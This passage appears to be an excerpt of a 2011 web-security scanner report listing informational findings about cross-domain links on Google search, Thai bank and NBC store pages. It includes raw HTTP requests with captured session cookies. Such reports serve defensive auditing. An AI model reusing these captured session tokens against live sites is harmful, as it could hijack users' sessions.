<div class=osl><a href="http://group.barclays.com/Careers" onmousedown="return clk(this.href,'','','','2','','0CCsQ0gIoADAB')">Careers</a> - <a href="http://group.barclays.com/Country/1225802850641.html" onmousedown="return clk(this.href,'','','','2','','0CCwQ0gIoATAB')">UK</a> - <a href="http://group.barclays.com/Investor-Relations" onmousedown="return clk(this.href,'','','','2','','0CC0Q0gIoAjAB')">Investor Relations</a> - <a href="http://group.barclays.com/About-us" onmousedown="return clk(this.href,'','','','2','','0CC4Q0gIoAzAB')">About us</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:egKNWVrzpQwJ:group.barclays.com/+barkley+bank&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<h3 class=r><a href="http://www.hulu.com/watch/119799/saturday-night-live-barkleys-bank" class=l onmousedown="return clk(this.href,'','8134260256875191063','','3','','0CDAQtwIwAg')">Saturday Night Live: <em>
...[SNIP]...
<h3 class="r"><a href="http://www.barkleybank.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CDgQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:SwGkbnS-obUJ:www.barkleybank.com/+barkley+bank&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CD0QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.consumercomplaints.in/complaints/barkley-bankcredit-car-c51443.html" class=l onmousedown="return clk(this.href,'','','','5','','0CD8QFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:1HvoYPPrTH0J:www.consumercomplaints.in/complaints/barkley-bankcredit-car-c51443.html+barkley+bank&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London" class=l onmousedown="return clk(this.href,'','','','6','','0CEYQFjAF')">Answers.com - Who is Director of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mtmalYwDJbcJ:wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London+barkley+bank&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CE4QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://tv.popcrunch.com/snl-commercials-barkleys-bank-peepers-insurance-video/" class=l onmousedown="return clk(this.href,'','','','7','','0CFAQFjAG')">SNL Commercials: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZlGgsP7R8XcJ:tv.popcrunch.com/snl-commercials-barkleys-bank-peepers-insurance-video/+barkley+bank&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFUQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nbc.com/saturday-night-live/video/barkleys-bank/1191615/" class=l onmousedown="return clk(this.href,'','','','8','','0CFcQFjAH')">Saturday Night Live - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mHpk_dyLwvgJ:www.nbc.com/saturday-night-live/video/barkleys-bank/1191615/+barkley+bank&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFwQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.woodforest.com/Barkley/default.htm" class=l onmousedown="return clk(this.href,'','','','9','','0CF4QFjAI')">Woodforest National <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WYLe3ckDA4EJ:www.woodforest.com/Barkley/default.htm+barkley+bank&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGMQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.thephilbingroup.com/portfolio/Commercial/27/Peoples-Bank-Barkley" class=l onmousedown="return clk(this.href,'','','','10','','0CGUQFjAJ')">People&#39;s <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Tf_OkRuRheEJ:www.thephilbingroup.com/portfolio/Commercial/27/Peoples-Bank-Barkley+barkley+bank&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGoQIDAJ')">Cached</a>
...[SNIP]...

22.36. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Kasikorn+Bank HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=HfFdn9n5LQSBV_6qMo8w5eh1JPxJ22N4d7ME-n4CpoG0Pt1fAvuZFMASF-UtF6oB21IuFyfkLpYaH0m_T3hMrA31Aueqwtif5xnsXw2EUw1C8kNgsQLLVpzPIAlyXsyf

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:24:42 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 34106

f94-wCe9....S....o...L.......>.....Q...<!doctype html> <head> <title>Kasikorn Bank - Google Search</title> <script>window.google={kEI:"CvS_TcqPJM-1tgfZ1PW_BQ",kEXPI:"17259,24472,25907,27147,28514
...[SNIP]...
</a> - <a href="http://www.kasikornbank.com/EN/Personal/Pages/ContactUs.aspx./^..1','','0CCIQ0gIoATAAS)...)kasikornbank.com/EN/Personal/BankAccounts./^.x1','','0CCMQ0gIoAjAA')">Bank Accounts</a> - <a href="http://www.kasikornbank.com/EN/ServicesChannel/SearchServiceChannel./^.e1','','0CCQQ0gIoAzAA')">Service Channels</a>
...[SNIP]...
</a> - <a href="http://www.kasikornbank.com/TH/CareersScholarship/./^.}2','','0CC4Q0gIoATAB')">..........................................</a> - <a href="http://www.kasikornbank.com/TH/RatesAndFees./^..02','','0CC8Q0gIoAjAB')">............................................................</a> - <a href="http://www.kasikornbank.com/TH/ApplyForServices/Pages/OnlineApplication.aspx./^...2','','0CDAQ0gIoAzAB')">...............................................................</a>
...[SNIP]...

22.37. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=8&ved=0CFwQFjAH&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FList_of_banks_in_Thailand&ei=dOq_TaiEJoXAtgflx724BQ&usg=AFQjCNGBDC_HCzDp764ZiV6J00Nx31D4wA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=HfFdn9n5LQSBV_6qMo8w5eh1JPxJ22N4d7ME-n4CpoG0Pt1fAvuZFMASF-UtF6oB21IuFyfkLpYaH0m_T3hMrA31Aueqwtif5xnsXw2EUw1C8kNgsQLLVpzPIAlyXsyf

Response

HTTP/1.1 302 Found
Location: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 11:44:03 GMT
Server: gws
Content-Length: 251
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://en.wikipedia.org/wiki/List_of_banks_in_Thailand">here</A>
...[SNIP]...

22.38. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=1&ved=0CCEQFjAA&url=http%3A%2F%2Fwww.bot.or.th%2Fenglish%2F&ei=dOq_TaiEJoXAtgflx724BQ&usg=AFQjCNHyzewx4DoCuWTMLCkF29X4UljaVw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=HfFdn9n5LQSBV_6qMo8w5eh1JPxJ22N4d7ME-n4CpoG0Pt1fAvuZFMASF-UtF6oB21IuFyfkLpYaH0m_T3hMrA31Aueqwtif5xnsXw2EUw1C8kNgsQLLVpzPIAlyXsyf

Response

HTTP/1.1 302 Found
Location: http://www.bot.or.th/english/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 11:43:54 GMT
Server: gws
Content-Length: 226
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.bot.or.th/english/">here</A>
...[SNIP]...

22.39. http://www.googleadservices.com/pagead/conversion/1032234781/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1032234781/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/conversion/1032234781/?random=1304447616843&cv=6&fst=1304447616843&num=1&fmt=2&value=0&label=F_NOCOHNgwIQnc6a7AM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=5&u_nmime=39&ref=http%3A//nerdbots.com/index.html&url=http%3A//nerdbots.com/services.html HTTP/1.1
Host: www.googleadservices.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nerdbots.com/services.html
Cookie: Conversion=CukBQlBHd0N0d1BBVGNMOEJJcXU2QWFnaWVrVWdZcTg2Z0hocTZtYkdjQ050d0dBcjVjQkVBTVlBeURNbmN3REtBbzRBRkNnN01yaF9mX19fXzhCWU1udWc0andvLXdTb0FHZHpwcnNBN0lCRm1admNtMXNaWE56Ym1WMGQyOXlhMmx1Wnk1amIyMjZBUUpxYzhnQkFkb0JIbWgwZEhBNkx5OW1iM0p0YkdWemMyNWxkSGR2Y210cGJtY3VZMjl0TDRBQ0FjZ0M4WnVHRjZnREFlZ0RaZWdETy1nRGpBam9BN2NDOVFOQUFBREUSEwi9kMrM8suoAhWBTOUKHahwT6kYASCau73a8ZeGiS9IAQ

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Tue, 03 May 2011 13:45:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: Conversion=CukBQlBHd0N0d1BBVGNMOEJJcXU2QWFnaWVrVWdZcTg2Z0hocTZtYkdjQ050d0dBcjVjQkVBTVlBeURNbmN3REtBbzRBRkNnN01yaF9mX19fXzhCWU1udWc0andvLXdTb0FHZHpwcnNBN0lCRm1admNtMXNaWE56Ym1WMGQyOXlhMmx1Wnk1amIyMjZBUUpxYzhnQkFkb0JIbWgwZEhBNkx5OW1iM0p0YkdWemMyNWxkSGR2Y210cGJtY3VZMjl0TDRBQ0FjZ0M4WnVHRjZnREFlZ0RaZWdETy1nRGpBam9BN2NDOVFOQUFBREUSEwi9kMrM8suoAhWBTOUKHahwT6kYACD5qcGhrOinyzpIAQ; expires=Thu, 02-Jun-2011 13:31:49 GMT; path=/pagead/conversion/1032234781/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1032234781/?random=1304447616843&cv=6&fst=1304447616843&num=1&fmt=2&value=0&label=F_NOCOHNgwIQnc6a7AM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=5&u_nmime=39&ref=http%3A//nerdbots.com/index.html&url=http%3A//nerdbots.com/services.html&ctc_id=CN_8p8f1y6gCFRNe7AodIyoaog&ct_cookie_present=true&ctc_ai=BPI5RAAAAAACAgICwDwAA4aupmxkAADgB
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 379

<html><body bgcolor="#ffffff" link="#000000" alink="#000000" vlink="#000000" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans
...[SNIP]...
<br><a href="https://services.google.com/sitestats/en.html?cid=1032234781" target="_blank">learn more</a>
...[SNIP]...

22.40. http://www.kasikornbank.com/Pages/truehitsstat.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kasikornbank.com
Path:   /Pages/truehitsstat.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Pages/truehitsstat.html?pagename=(en)%20Menu%20Item%20Navigation:%20/EN/Pages/Default.aspx HTTP/1.1
Host: www.kasikornbank.com
Proxy-Connection: keep-alive
Referer: http://www.kasikornbank.com/EN/Pages/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=211127951.1304443502.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Kasikorn%20Bank; __utma=211127951.1235232646.1304443502.1304443502.1304443502.1; __utmc=211127951; __utmb=211127951.1.10.1304443502

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Type: text/html
Last-Modified: Tue, 03 May 2011 10:47:15 GMT
ETag: "{1C07B3B6-9458-43A0-8754-31CB185703B4},17908"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
ResourceTag: rt:1C07B3B6-9458-43A0-8754-31CB185703B4@00000017908
Exires: Mon, 18 Apr 2011 12:25:05 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 12:25:05 GMT
Content-Length: 8648

<script language="javascript1.1">
var page="dummy";

var qsParm = new Array();
function qs() {
var query = window.location.search.substring(1);
var parms = query.split('&');
for (var i=0;
...[SNIP]...
</script> -->
<script language="javascript1.1" src="http://hits.truehits.in.th/data/f0010172.js"></script>
...[SNIP]...

22.41. http://www.ktam.co.th/media_box.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /media_box.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /media_box.php?m=64 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:19 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 538

<OBJECT ID="mediaPlayer" width="205" height="180" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..." TYPE="application/x-oleobject">
<PARAM NAME="fileName" VALUE="./medias/KTSV-Clip Ad.wmv">
...[SNIP]...

22.42. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcuniversalstore.com
Path:   /william-catherine-royal-wedding-dvd/detail.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products HTTP/1.1
Host: www.nbcuniversalstore.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/
Cookie: SESSID=dd19ab195577124911a017a83007c863; DASHORTNAME=nbcuniversalstore; DAABTEST=B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Tue, 03 May 2011 13:32:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:59 GMT
Connection: close
Set-Cookie: DACART=deleted; expires=Mon, 03-May-2010 13:32:57 GMT; path=/; domain=nbcuniversalstore.com
Content-Length: 82600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="
...[SNIP]...
<link href="/nbcuniversalstore/layout/slimbox.css?v=18" type="text/css" rel="stylesheet" />
           
<link rel="stylesheet" href="http://assets.resultspage.com/autosuggest/autosuggest.css" media="screen" type="text/css">


<link href="/nbcuniversalstore/layout/nbcu/nbcu.css?v=18" type="text/css" rel="stylesheet" />
...[SNIP]...
<div id="userMenu" >
<a href="http://twitter.com/nbcstore" target="_blank" id="twitter"><span class="socialize">
...[SNIP]...
</a><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank" id="facebook"><span class="socialize">
...[SNIP]...
</a>    

<a href="http://nbcuni.com/" target="_blank" class="partnerlink "> Visit NBCU.com</a>
...[SNIP]...
<div class="textPromo">
<iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=5;sz=246x100;ord=1304429578?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=5;sz=246x100;abr=!ie;ord=1304429578?"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/homepage;tile=5;sz=246x100;ord=1304429578?"><img src="http://ad.doubleclick.net/ad/agt.nbcuni/homepage;tile=5;sz=246x100;ord=1304429578?" border="0" alt="" /></a>
...[SNIP]...
<div class="textPromo">
<iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=6;sz=726x100;ord=1304429578?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=6;sz=726x100;abr=!ie;ord=1304429578?"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/homepage;tile=6;sz=726x100;ord=1304429578?"><img src="http://ad.doubleclick.net/ad/agt.nbcuni/homepage;tile=6;sz=726x100;ord=1304429578?" border="0" alt="" /></a>
...[SNIP]...
<div id="contentHolder">


<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<p>
                                                                       
        <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D298028%26v%3Dnbcu_featured-products&amp;layout=standard&amp;show_faces=false&amp;width=260&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=25" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:260px; height:25px;" allowTransparency="true"></iframe>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style">
       <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=deliveryagent" class="addthis_button last"><img src="/nbcuniversalstore/layout/ico_addshare.gif"
           width="16" height="16" border="0" alt="" />
...[SNIP]...
</script>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=deliveryagent"></script>
...[SNIP]...
<li>
<a href="http://html.aggregateknowledge.com/click/nocache/293790196/?id=24a6eda4-6d4d-4511-bb1a-99a32ca9cfbb&impid=32&rid=94&l=en_US&itemid=1088997&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294476%26icid%3Dxsell" class="image"><img src="/img/product/resized/458/00294476-805458_50.jpg?k=e56f13c4&pid=294476&s=catl" alt="Emily Posts Wedding Etiquette (Book)" /></a>
    <a href="http://html.aggregateknowledge.com/click/nocache/293790196/?id=24a6eda4-6d4d-4511-bb1a-99a32ca9cfbb&impid=32&rid=94&l=en_US&itemid=1088997&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294476%26icid%3Dxsell" class="name">Emily Posts Wedding Etiquette (Book)</a>
    <a href="http://html.aggregateknowledge.com/click/nocache/293790196/?id=24a6eda4-6d4d-4511-bb1a-99a32ca9cfbb&impid=32&rid=94&l=en_US&itemid=1088997&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294476%26icid%3Dxsell" class="price">$27.99<!-- IE6 -->
...[SNIP]...
<li>
<a href="http://html.aggregateknowledge.com/click/nocache/1355922328/?id=24a6eda4-6d4d-4511-bb1a-99a32ca9cfbb&impid=32&rid=94&l=en_US&itemid=1093587&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D296596%26icid%3Dxsell" class="image"><img src="/img/product/resized/428/00296596-233428_50.jpg?k=35991873&pid=296596&s=catl" alt="Royal Wedding William & Catherine..." /></a>
    <a href="http://html.aggregateknowledge.com/click/nocache/1355922328/?id=24a6eda4-6d4d-4511-bb1a-99a32ca9cfbb&impid=32&rid=94&l=en_US&itemid=1093587&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D296596%26icid%3Dxsell" class="name">Royal Wedding William & Catherine...</a>
    <a href="http://html.aggregateknowledge.com/click/nocache/1355922328/?id=24a6eda4-6d4d-4511-bb1a-99a32ca9cfbb&impid=32&rid=94&l=en_US&itemid=1093587&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D296596%26icid%3Dxsell" class="price">$18.95<!-- IE6 -->
...[SNIP]...
<li class="last">
<a href="http://html.aggregateknowledge.com/click/nocache/1355637560/?id=24a6eda4-6d4d-4511-bb1a-99a32ca9cfbb&impid=32&rid=94&l=en_US&itemid=1087529&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294467%26icid%3Dxsell" class="image"><img src="/img/product/resized/979/00294467-796979_50.jpg?k=7c3ae6e8&pid=294467&s=catl" alt="Making of a Royal Romance William,..." /></a>
    <a href="http://html.aggregateknowledge.com/click/nocache/1355637560/?id=24a6eda4-6d4d-4511-bb1a-99a32ca9cfbb&impid=32&rid=94&l=en_US&itemid=1087529&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294467%26icid%3Dxsell" class="name">Making of a Royal Romance William,...</a>
    <a href="http://html.aggregateknowledge.com/click/nocache/1355637560/?id=24a6eda4-6d4d-4511-bb1a-99a32ca9cfbb&impid=32&rid=94&l=en_US&itemid=1087529&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294467%26icid%3Dxsell" class="price">$15.00<!-- IE6 -->
...[SNIP]...
<div class="textPromo">
<iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=7;sz=246x100;ord=1304429578?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=7;sz=246x100;abr=!ie;ord=1304429578?"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/homepage;tile=7;sz=246x100;ord=1304429578?"><img src="http://ad.doubleclick.net/ad/agt.nbcuni/homepage;tile=7;sz=246x100;ord=1304429578?" border="0" alt="" /></a>
...[SNIP]...
<div class="textPromo">
<iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=8;sz=726x100;ord=1304429578?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=8;sz=726x100;abr=!ie;ord=1304429578?"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/homepage;tile=8;sz=726x100;ord=1304429578?"><img src="http://ad.doubleclick.net/ad/agt.nbcuni/homepage;tile=8;sz=726x100;ord=1304429578?" border="0" alt="" /></a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank"><img src="/nbcuniversalstore/layout/logo_facebook.gif" alt="Facebook Logo" />
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/nbcstore" target="_blank"><img src="/nbcuniversalstore/layout/logo_twitter.gif" alt="Twitter Logo" />
...[SNIP]...
<!-- START SCANALERT CODE -->
   <a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<p id="companyCopy" style="font-size:11px;">&copy;2011 <a href="http://www.nbcuni.com/">NBC Universal</a>
...[SNIP]...
<p id="daPower" style="margin-top:5px;">Powered by <a href="http://www.deliveryagent.com/" target="_blank"><img src="/nbcuniversalstore/layout/logo_da.gif"alt="Delivery Agent" />
...[SNIP]...
</script>

<script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27">
</script>
<noscript>
<img height="1" width="1" border="0" src="http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27">
</noscript>
...[SNIP]...
</script>


<iframe width="1" height="1" frameborder="0" src="http://html.aggregateknowledge.com/iframe?pid=32&itemid=298028&senduuid=0&che=1304429579"></iframe>

<script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"></script>
...[SNIP]...

22.43. http://www.newsroom.barclays.com/content/Detail.aspx  previous  next

Summary

Severity:   Information
